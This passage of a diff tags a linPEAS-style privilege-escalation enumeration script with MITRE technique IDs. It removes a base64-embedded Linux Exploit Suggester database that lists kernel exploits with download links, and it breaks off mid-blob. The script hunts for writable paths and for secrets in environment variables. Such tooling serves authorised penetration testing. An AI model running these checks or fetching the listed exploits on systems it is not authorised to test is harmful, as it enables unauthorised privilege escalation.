"T1548.003,T1068" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.html" pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+") if [ -z "$pc_version" ]; then @@ -1771,7 +3077,10 @@ if (busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator) || [ "$DEBUG" ]; th fi echo "" -print_2title "PATH" +fi + +if check_mitre_filter "T1574.007"; then +print_2title "PATH" "T1574.007" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-path-abuses" if ! [ "$IAMROOT" ]; then echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" @@ -1781,91 +3090,126 @@ if [ "$DEBUG" ]; then fi echo "" -print_2title "Date & uptime" +fi + +if check_mitre_filter "T1082"; then +print_2title "Date & uptime" "T1082" warn_exec date 2>/dev/null warn_exec uptime 2>/dev/null echo "" +fi + +if check_mitre_filter "T1082"; then if [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then - print_2title "CPU info" + print_2title "CPU info" "T1082" warn_exec lscpu 2>/dev/null echo "" fi +fi + +if check_mitre_filter "T1082,T1120"; then if [ -f "/etc/fstab" ] || [ "$DEBUG" ]; then - print_2title "Unmounted file-system?" + print_2title "Unmounted file-system?" "T1082,T1120" print_info "Check if you can mount umounted devices" grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED},g" | sed -${E} "s%$mounted%${SED_BLUE}%g" | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g" echo "" fi +fi + +if check_mitre_filter "T1082"; then if [ -d "/dev" ] || [ "$DEBUG" ] ; then - print_2title "Any sd*/disk* disk in /dev? (limit 20)" + print_2title "Any sd*/disk* disk in /dev? (limit 20)" "T1082" ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20 echo "" fi if [ "$(command -v smbutil 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]; then - print_2title "Mounted SMB Shares" + print_2title "Mounted SMB Shares" "T1082" warn_exec smbutil statshares -a echo "" fi +fi + +if check_mitre_filter "T1082"; then if ([ "$(command -v diskutil 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]) && [ "$EXTRA_CHECKS" ]; then - print_2title "Mounted disks information" + print_2title "Mounted disks information" "T1082" warn_exec diskutil list echo "" fi if [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then - print_2title "System stats" + print_2title "System stats" "T1082" (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk" warn_exec free 2>/dev/null echo "" + print_2title "Inode usage" "T1082" + warn_exec df -i 2>/dev/null + echo "" fi -print_2title "Environment" +fi + +if check_mitre_filter "T1082,T1552.007"; then +print_2title "Environment" "T1082,T1552.007" print_info "Any private information inside environment variables?" (env || printenv || set) 2>/dev/null | grep -Eiv "$NoEnvVars" | sed -${E} "s,$EnvVarsRed,${SED_RED},g" || echo_not_found "env || set" echo "" +fi + +if check_mitre_filter "T1082"; then if [ "$(command -v dmesg 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]; then - print_2title "Searching Signature verification failed in dmesg" + print_2title "Searching Signature verification failed in dmesg" "T1082" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#dmesg-signature-verification-failed" (dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg" echo "" fi +fi + +if check_mitre_filter "T1082"; then if [ "$MACPEAS" ]; then - print_2title "Kernel Extensions not belonging to apple" + print_2title "Kernel Extensions not belonging to apple" "T1082" kextstat 2>/dev/null | grep -Ev " com.apple." echo "" - print_2title "Unsigned Kernel Extensions" + print_2title "Unsigned Kernel Extensions" "T1082" macosNotSigned /Library/Extensions macosNotSigned /System/Library/Extensions echo "" fi if [ "$MACPEAS" ] && [ "$(command -v brew 2>/dev/null || echo -n '')" ]; then - print_2title "Brew Doctor Suggestions" + print_2title "Brew Doctor Suggestions" "T1082" brew doctor echo "" fi -if [ "$(command -v bash 2>/dev/null || echo -n '')" ] && ! [ "$MACPEAS" ]; then - print_2title "Executing Linux Exploit Suggester" - print_info "https://github.com/mzet-/linux-exploit-suggester" - les_b64="IyEvYmluL2Jhc2gKCiMKIyBDb3B5cmlnaHQgKGMpIDIwMTYtMjAyMywgaHR0cHM6Ly9naXRodWIuY29tL216ZXQtCiMKIyBsaW51eC1leHBsb2l0LXN1Z2dlc3Rlci5zaCBjb21lcyB3aXRoIEFCU09MVVRFTFkgTk8gV0FSUkFOVFkuCiMgVGhpcyBpcyBmcmVlIHNvZnR3YXJlLCBhbmQgeW91IGFyZSB3ZWxjb21lIHRvIHJlZGlzdHJpYnV0ZSBpdAojIHVuZGVyIHRoZSB0ZXJtcyBvZiB0aGUgR05VIEdlbmVyYWwgUHVibGljIExpY2Vuc2UuIFNlZSBMSUNFTlNFCiMgZmlsZSBmb3IgdXNhZ2Ugb2YgdGhpcyBzb2Z0d2FyZS4KIwoKVkVSU0lPTj12MS4xCgojIGJhc2ggY29sb3JzCiN0eHRyZWQ9IlxlWzA7MzFtIgp0eHRyZWQ9IlxlWzkxOzFtIgp0eHRncm49IlxlWzE7MzJtIgp0eHRncmF5PSJcZVswOzM3bSIKdHh0Ymx1PSJcZVswOzM2bSIKdHh0cnN0PSJcZVswbSIKYmxkd2h0PSdcZVsxOzM3bScKd2h0PSdcZVswOzM2bScKYmxkYmx1PSdcZVsxOzM0bScKeWVsbG93PSdcZVsxOzkzbScKbGlnaHR5ZWxsb3c9J1xlWzA7OTNtJwoKIyBpbnB1dCBkYXRhClVOQU1FX0E9IiIKCiMgcGFyc2VkIGRhdGEgZm9yIGN1cnJlbnQgT1MKS0VSTkVMPSIiCk9TPSIiCkRJU1RSTz0iIgpBUkNIPSIiClBLR19MSVNUPSIiCgojIGtlcm5lbCBjb25maWcKS0NPTkZJRz0iIgoKQ1ZFTElTVF9GSUxFPSIiCgpvcHRfZmV0Y2hfYmlucz1mYWxzZQpvcHRfZmV0Y2hfc3Jjcz1mYWxzZQpvcHRfa2VybmVsX3ZlcnNpb249ZmFsc2UKb3B0X3VuYW1lX3N0cmluZz1mYWxzZQpvcHRfcGtnbGlzdF9maWxlPWZhbHNlCm9wdF9jdmVsaXN0X2ZpbGU9ZmFsc2UKb3B0X2NoZWNrc2VjX21vZGU9ZmFsc2UKb3B0X2Z1bGw9ZmFsc2UKb3B0X3N1bW1hcnk9ZmFsc2UKb3B0X2tlcm5lbF9vbmx5PWZhbHNlCm9wdF91c2Vyc3BhY2Vfb25seT1mYWxzZQpvcHRfc2hvd19kb3M9ZmFsc2UKb3B0X3NraXBfbW9yZV9jaGVja3M9ZmFsc2UKb3B0X3NraXBfcGtnX3ZlcnNpb25zPWZhbHNlCgpBUkdTPQpTSE9SVE9QVFM9ImhWZmJzdTprOmRwOmciCkxPTkdPUFRTPSJoZWxwLHZlcnNpb24sZnVsbCxmZXRjaC1iaW5hcmllcyxmZXRjaC1zb3VyY2VzLHVuYW1lOixrZXJuZWw6LHNob3ctZG9zLHBrZ2xpc3QtZmlsZTosc2hvcnQsa2VybmVsc3BhY2Utb25seSx1c2Vyc3BhY2Utb25seSxza2lwLW1vcmUtY2hlY2tzLHNraXAtcGtnLXZlcnNpb25zLGN2ZWxpc3QtZmlsZTosY2hlY2tzZWMiCgojIyBleHBsb2l0cyBkYXRhYmFzZQpkZWNsYXJlIC1hIEVYUExPSVRTCmRlY2xhcmUgLWEgRVhQTE9JVFNfVVNFUlNQQUNFCgojIyB0ZW1wb3JhcnkgYXJyYXkgZm9yIHB1cnBvc2Ugb2Ygc29ydGluZyBleHBsb2l0cyAoYmFzZWQgb24gZXhwbG9pdHMnIHJhbmspCmRlY2xhcmUgLWEgZXhwbG9pdHNfdG9fc29ydApkZWNsYXJlIC1hIFNPUlRFRF9FWFBMT0lUUwoKIyMjIyMjIyMjIyMjIExJTlVYIEtFUk5FTFNQQUNFIEVYUExPSVRTICMjIyMjIyMjIyMjIyMjIyMjIyMjCm49MAoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA0LTEyMzVdJHt0eHRyc3R9IGVsZmxibApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj0yLjQuMjkKVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9pc2VjLnBsL3Z1bG5lcmFiaWxpdGllcy9pc2VjLTAwMjEtdXNlbGliLnR4dApiaW4tdXJsOiBodHRwczovL3dlYi5hcmNoaXZlLm9yZy93ZWIvMjAxMTExMDMwNDI5MDQvaHR0cDovL3RhcmFudHVsYS5ieS5ydS9sb2NhbHJvb3QvMi42LngvZWxmbGJsCmV4cGxvaXQtZGI6IDc0NApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA0LTEyMzVdJHt0eHRyc3R9IHVzZWxpYigpClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPTIuNC4yOQpUYWdzOgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL2lzZWMucGwvdnVsbmVyYWJpbGl0aWVzL2lzZWMtMDAyMS11c2VsaWIudHh0CmV4cGxvaXQtZGI6IDc3OApDb21tZW50czogS25vd24gdG8gd29yayBvbmx5IGZvciAyLjQgc2VyaWVzIChldmVuIHRob3VnaCAyLjYgaXMgYWxzbyB2dWxuZXJhYmxlKQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA0LTEyMzVdJHt0eHRyc3R9IGtyYWQzClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuNSx2ZXI8PTIuNi4xMQpUYWdzOgpSYW5rOiAxCmV4cGxvaXQtZGI6IDEzOTcKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwNC0wMDc3XSR7dHh0cnN0fSBtcmVtYXBfcHRlClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMCx2ZXI8PTIuNi4yClRhZ3M6ClJhbms6IDEKZXhwbG9pdC1kYjogMTYwCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDYtMjQ1MV0ke3R4dHJzdH0gcmFwdG9yX3ByY3RsClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTMsdmVyPD0yLjYuMTcKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAyMDMxCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDYtMjQ1MV0ke3R4dHJzdH0gcHJjdGwKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4xMyx2ZXI8PTIuNi4xNwpUYWdzOgpSYW5rOiAxCmV4cGxvaXQtZGI6IDIwMDQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwNi0yNDUxXSR7dHh0cnN0fSBwcmN0bDIKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4xMyx2ZXI8PTIuNi4xNwpUYWdzOgpSYW5rOiAxCmV4cGxvaXQtZGI6IDIwMDUKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwNi0yNDUxXSR7dHh0cnN0fSBwcmN0bDMKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4xMyx2ZXI8PTIuNi4xNwpUYWdzOgpSYW5rOiAxCmV4cGxvaXQtZGI6IDIwMDYKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwNi0yNDUxXSR7dHh0cnN0fSBwcmN0bDQKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4xMyx2ZXI8PTIuNi4xNwpUYWdzOgpSYW5rOiAxCmV4cGxvaXQtZGI6IDIwMTEKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwNi0zNjI2XSR7dHh0cnN0fSBoMDBseXNoaXQKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi44LHZlcjw9Mi42LjE2ClRhZ3M6ClJhbms6IDEKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTExMTAzMDQyOTA0L2h0dHA6Ly90YXJhbnR1bGEuYnkucnUvbG9jYWxyb290LzIuNi54L2gwMGx5c2hpdApleHBsb2l0LWRiOiAyMDEzCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDgtMDYwMF0ke3R4dHJzdH0gdm1zcGxpY2UxClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTcsdmVyPD0yLjYuMjQKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiA1MDkyCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDgtMDYwMF0ke3R4dHJzdH0gdm1zcGxpY2UyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMjMsdmVyPD0yLjYuMjQKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiA1MDkzCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDgtNDIxMF0ke3R4dHJzdH0gZnRyZXgKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4xMSx2ZXI8PTIuNi4yMgpUYWdzOgpSYW5rOiAxCmV4cGxvaXQtZGI6IDY4NTEKQ29tbWVudHM6IHdvcmxkLXdyaXRhYmxlIHNnaWQgZGlyZWN0b3J5IGFuZCBzaGVsbCB0aGF0IGRvZXMgbm90IGRyb3Agc2dpZCBwcml2cyB1cG9uIGV4ZWMgKGFzaC9zYXNoKSBhcmUgcmVxdWlyZWQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOC00MjEwXSR7dHh0cnN0fSBleGl0X25vdGlmeQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjI1LHZlcjw9Mi42LjI5ClRhZ3M6ClJhbms6IDEKZXhwbG9pdC1kYjogODM2OQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA5LTI2OTJdJHt0eHRyc3R9IHNvY2tfc2VuZHBhZ2UgKHNpbXBsZSB2ZXJzaW9uKQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjAsdmVyPD0yLjYuMzAKVGFnczogdWJ1bnR1PTcuMTAsUkhFTD00LGZlZG9yYT00fDV8Nnw3fDh8OXwxMHwxMQpSYW5rOiAxCmV4cGxvaXQtZGI6IDk0NzkKQ29tbWVudHM6IFdvcmtzIGZvciBzeXN0ZW1zIHdpdGggL3Byb2Mvc3lzL3ZtL21tYXBfbWluX2FkZHIgZXF1YWwgdG8gMApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA5LTI2OTIsQ1ZFLTIwMDktMTg5NV0ke3R4dHJzdH0gc29ja19zZW5kcGFnZQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjAsdmVyPD0yLjYuMzAKVGFnczogdWJ1bnR1PTkuMDQKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8veG9ybC53b3JkcHJlc3MuY29tLzIwMDkvMDcvMTYvY3ZlLTIwMDktMTg5NS1saW51eC1rZXJuZWwtcGVyX2NsZWFyX29uX3NldGlkLXBlcnNvbmFsaXR5LWJ5cGFzcy8Kc3JjLXVybDogaHR0cHM6Ly9naXRsYWIuY29tL2V4cGxvaXQtZGF0YWJhc2UvZXhwbG9pdGRiLWJpbi1zcGxvaXRzLy0vcmF3L21haW4vYmluLXNwbG9pdHMvOTQzNS50Z3oKZXhwbG9pdC1kYjogOTQzNQpDb21tZW50czogL3Byb2Mvc3lzL3ZtL21tYXBfbWluX2FkZHIgbmVlZHMgdG8gZXF1YWwgMCBPUiBwdWxzZWF1ZGlvIG5lZWRzIHRvIGJlIGluc3RhbGxlZApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA5LTI2OTIsQ1ZFLTIwMDktMTg5NV0ke3R4dHJzdH0gc29ja19zZW5kcGFnZTIKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4wLHZlcjw9Mi42LjMwClRhZ3M6IApSYW5rOiAxCnNyYy11cmw6IGh0dHBzOi8vZ2l0bGFiLmNvbS9leHBsb2l0LWRhdGFiYXNlL2V4cGxvaXRkYi1iaW4tc3Bsb2l0cy8tL3Jhdy9tYWluL2Jpbi1zcGxvaXRzLzk0MzYudGd6CmV4cGxvaXQtZGI6IDk0MzYKQ29tbWVudHM6IFdvcmtzIGZvciBzeXN0ZW1zIHdpdGggL3Byb2Mvc3lzL3ZtL21tYXBfbWluX2FkZHIgZXF1YWwgdG8gMApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA5LTI2OTIsQ1ZFLTIwMDktMTg5NV0ke3R4dHJzdH0gc29ja19zZW5kcGFnZTMKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4wLHZlcjw9Mi42LjMwClRhZ3M6IApSYW5rOiAxCnNyYy11cmw6IGh0dHBzOi8vZ2l0bGFiLmNvbS9leHBsb2l0LWRhdGFiYXNlL2V4cGxvaXRkYi1iaW4tc3Bsb2l0cy8tL3Jhdy9tYWluL2Jpbi1zcGxvaXRzLzk2NDEudGFyLmd6CmV4cGxvaXQtZGI6IDk2NDEKQ29tbWVudHM6IC9wcm9jL3N5cy92bS9tbWFwX21pbl9hZGRyIG5lZWRzIHRvIGVxdWFsIDAgT1IgcHVsc2VhdWRpbyBuZWVkcyB0byBiZSBpbnN0YWxsZWQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0yNjkyLENWRS0yMDA5LTE4OTVdJHt0eHRyc3R9IHNvY2tfc2VuZHBhZ2UgKHBwYykKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4wLHZlcjw9Mi42LjMwClRhZ3M6IHVidW50dT04LjEwLFJIRUw9NHw1ClJhbms6IDEKZXhwbG9pdC1kYjogOTU0NQpDb21tZW50czogL3Byb2Mvc3lzL3ZtL21tYXBfbWluX2FkZHIgbmVlZHMgdG8gZXF1YWwgMApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA5LTI2OThdJHt0eHRyc3R9IHRoZSByZWJlbCAodWRwX3NlbmRtc2cpClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMSx2ZXI8PTIuNi4xOQpUYWdzOiBkZWJpYW49NApSYW5rOiAxCnNyYy11cmw6IGh0dHBzOi8vZ2l0bGFiLmNvbS9leHBsb2l0LWRhdGFiYXNlL2V4cGxvaXRkYi1iaW4tc3Bsb2l0cy8tL3Jhdy9tYWluL2Jpbi1zcGxvaXRzLzk1NzQudGd6CmV4cGxvaXQtZGI6IDk1NzQKYW5hbHlzaXMtdXJsOiBodHRwczovL2Jsb2cuY3IwLm9yZy8yMDA5LzA4L2N2ZS0yMDA5LTI2OTgtdWRwc2VuZG1zZy12dWxuZXJhYmlsaXR5Lmh0bWwKYXV0aG9yOiBzcGVuZGVyCkNvbW1lbnRzOiAvcHJvYy9zeXMvdm0vbW1hcF9taW5fYWRkciBuZWVkcyB0byBlcXVhbCAwIE9SIHB1bHNlYXVkaW8gbmVlZHMgdG8gYmUgaW5zdGFsbGVkCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDktMjY5OF0ke3R4dHJzdH0gaG9hZ2llX3VkcF9zZW5kbXNnClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMSx2ZXI8PTIuNi4xOSx4ODYKVGFnczogZGViaWFuPTQKUmFuazogMQpleHBsb2l0LWRiOiA5NTc1CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9ibG9nLmNyMC5vcmcvMjAwOS8wOC9jdmUtMjAwOS0yNjk4LXVkcHNlbmRtc2ctdnVsbmVyYWJpbGl0eS5odG1sCmF1dGhvcjogYW5kaQpDb21tZW50czogV29ya3MgZm9yIHN5c3RlbXMgd2l0aCAvcHJvYy9zeXMvdm0vbW1hcF9taW5fYWRkciBlcXVhbCB0byAwCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDktMjY5OF0ke3R4dHJzdH0ga2F0b24gKHVkcF9zZW5kbXNnKQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjEsdmVyPD0yLjYuMTkseDg2ClRhZ3M6IGRlYmlhbj00ClJhbms6IDEKc3JjLXVybDogaHR0cHM6Ly9naXRodWIuY29tL0thYm90L1VuaXgtUHJpdmlsZWdlLUVzY2FsYXRpb24tRXhwbG9pdHMtUGFjay9yYXcvbWFzdGVyLzIwMDkvQ1ZFLTIwMDktMjY5OC9rYXRvbi5jCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9ibG9nLmNyMC5vcmcvMjAwOS8wOC9jdmUtMjAwOS0yNjk4LXVkcHNlbmRtc2ctdnVsbmVyYWJpbGl0eS5odG1sCmF1dGhvcjogVnhIZWxsIExhYnMKQ29tbWVudHM6IFdvcmtzIGZvciBzeXN0ZW1zIHdpdGggL3Byb2Mvc3lzL3ZtL21tYXBfbWluX2FkZHIgZXF1YWwgdG8gMApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA5LTI2OThdJHt0eHRyc3R9IGlwX2FwcGVuZF9kYXRhClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMSx2ZXI8PTIuNi4xOSx4ODYKVGFnczogZmVkb3JhPTR8NXw2LFJIRUw9NApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9ibG9nLmNyMC5vcmcvMjAwOS8wOC9jdmUtMjAwOS0yNjk4LXVkcHNlbmRtc2ctdnVsbmVyYWJpbGl0eS5odG1sCmV4cGxvaXQtZGI6IDk1NDIKYXV0aG9yOiBwMGM3M24xCkNvbW1lbnRzOiBXb3JrcyBmb3Igc3lzdGVtcyB3aXRoIC9wcm9jL3N5cy92bS9tbWFwX21pbl9hZGRyIGVxdWFsIHRvIDAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0zNTQ3XSR7dHh0cnN0fSBwaXBlLmMgMQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjAsdmVyPD0yLjYuMzEKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAzMzMyMQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA5LTM1NDddJHt0eHRyc3R9IHBpcGUuYyAyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMCx2ZXI8PTIuNi4zMQpUYWdzOgpSYW5rOiAxCmV4cGxvaXQtZGI6IDMzMzIyCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDktMzU0N10ke3R4dHJzdH0gcGlwZS5jIDMKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4wLHZlcjw9Mi42LjMxClRhZ3M6ClJhbms6IDEKZXhwbG9pdC1kYjogMTAwMTgKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMC0zMzAxXSR7dHh0cnN0fSBwdHJhY2Vfa21vZDIKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4yNix2ZXI8PTIuNi4zNApUYWdzOiBkZWJpYW49Ni4we2tlcm5lbDoyLjYuKDMyfDMzfDM0fDM1KS0oMXwyfHRydW5rKS1hbWQ2NH0sdWJ1bnR1PSgxMC4wNHwxMC4xMCl7a2VybmVsOjIuNi4oMzJ8MzUpLSgxOXwyMXwyNCktc2VydmVyfQpSYW5rOiAxCmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDExMTEwMzA0MjkwNC9odHRwOi8vdGFyYW50dWxhLmJ5LnJ1L2xvY2Fscm9vdC8yLjYueC9rbW9kMgpiaW4tdXJsOiBodHRwczovL3dlYi5hcmNoaXZlLm9yZy93ZWIvMjAxMTExMDMwNDI5MDQvaHR0cDovL3RhcmFudHVsYS5ieS5ydS9sb2NhbHJvb3QvMi42LngvcHRyYWNlLWttb2QKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjQxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvcHRyYWNlX2ttb2QyLTY0CmV4cGxvaXQtZGI6IDE1MDIzCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTAtMTE0Nl0ke3R4dHJzdH0gcmVpc2VyZnMKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4xOCx2ZXI8PTIuNi4zNApUYWdzOiB1YnVudHU9OS4xMApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9qb24ub2JlcmhlaWRlLm9yZy9ibG9nLzIwMTAvMDQvMTAvcmVpc2VyZnMtcmVpc2VyZnNfcHJpdi12dWxuZXJhYmlsaXR5LwpzcmMtdXJsOiBodHRwczovL2pvbi5vYmVyaGVpZGUub3JnL2ZpbGVzL3RlYW0tZWR3YXJkLnB5CmV4cGxvaXQtZGI6IDEyMTMwCmNvbW1lbnRzOiBSZXF1aXJlcyBhIFJlaXNlckZTIGZpbGVzeXN0ZW0gbW91bnRlZCB3aXRoIGV4dGVuZGVkIGF0dHJpYnV0ZXMKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMC0yOTU5XSR7dHh0cnN0fSBjYW5fYmNtClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTgsdmVyPD0yLjYuMzYKVGFnczogdWJ1bnR1PTEwLjA0e2tlcm5lbDoyLjYuMzItMjQtZ2VuZXJpY30KUmFuazogMQpiaW4tdXJsOiBodHRwczovL3dlYi5hcmNoaXZlLm9yZy93ZWIvMjAxNjA2MDIxOTI2NDEvaHR0cHM6Ly93d3cua2VybmVsLWV4cGxvaXRzLmNvbS9tZWRpYS9jYW5fYmNtCmV4cGxvaXQtZGI6IDE0ODE0CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTAtMzkwNF0ke3R4dHJzdH0gcmRzClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMzAsdmVyPDIuNi4zNwpUYWdzOiBkZWJpYW49Ni4we2tlcm5lbDoyLjYuKDMxfDMyfDM0fDM1KS0oMXx0cnVuayktYW1kNjR9LHVidW50dT0xMC4xMHw5LjEwLGZlZG9yYT0xM3trZXJuZWw6Mi42LjMzLjMtODUuZmMxMy5pNjg2LlBBRX0sdWJ1bnR1PTEwLjA0e2tlcm5lbDoyLjYuMzItKDIxfDI0KS1nZW5lcmljfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5zZWN1cml0eWZvY3VzLmNvbS9hcmNoaXZlLzEvNTE0Mzc5CnNyYy11cmw6IGh0dHA6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTAxMDIwMDQ0MDQ4L